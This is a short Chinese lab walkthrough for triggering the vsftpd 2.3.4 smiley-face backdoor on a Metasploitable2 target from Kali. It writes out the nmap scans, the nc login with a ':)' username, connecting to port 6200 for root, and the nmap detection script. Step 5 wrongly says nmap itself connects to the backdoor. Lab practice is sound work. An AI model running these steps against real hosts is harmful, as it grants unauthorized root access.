一、实验准备:
1、Metaspolitable2(靶机)
2、kali
二、实验步骤:
1、打开kali和靶机,两者都要处于NAT模式
2、在终端使用命令(ip addr)查看kali的ip 然后nmap+kali IP,得到靶机ip
3、执行nmap -sV +(靶机IP)得到端口服务信息
4.手动模拟FTP登录,nc 192.168.61.130 21 回车后输入FTP用户名USER 1:),回车输入密码PASS 123,然后就可以crtl+C退出当前nc连接,注意:用户名一定要带有“:)”这个是触发笑脸漏洞的关键,密码任意都行。
5、nmap 192.168.61.130 -p 6200就可以连接到靶机的后门,拿到root权限。
三、正式的NSE-nmap脚本
针对VSFTPD v2.3.4的检测脚本它的方法为--script加上脚本名即nmap --script ftp-vsftpd-backdoor 192.168.61.130
本文只做分享,不做它用